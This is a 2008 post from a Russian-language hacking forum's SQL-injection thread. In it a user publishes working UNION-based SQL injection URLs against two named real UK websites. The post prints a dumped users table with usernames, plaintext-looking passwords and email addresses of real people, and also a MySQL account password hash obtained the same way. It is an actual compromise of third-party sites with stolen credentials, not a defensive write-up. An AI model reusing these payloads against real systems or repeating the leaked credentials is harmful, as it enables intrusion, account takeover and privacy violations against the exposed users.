HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 28.07.2008, 11:54
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию
fat-cat.co.uk

Код:
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/*
Таблица users:
Код:
2iwantiwantiwantSeiji25xdl@tedra.net
3alex_teagundamalex_tea@r107.co.uk
......................................................................
......................................................................
1442chuppethxq92EAA932chuppeth@gmail.com
1443FemyanaehoowngIPouCm641lerik66@mymail-in.net
хеш текушева пользователя mysql.user и вывод file_priv
Код:
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/
file_priv нет
Код:
Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A
sublackwell.co.uk
Код:
http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--
Mysql 5 версии таблиц интересных не нашел (
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.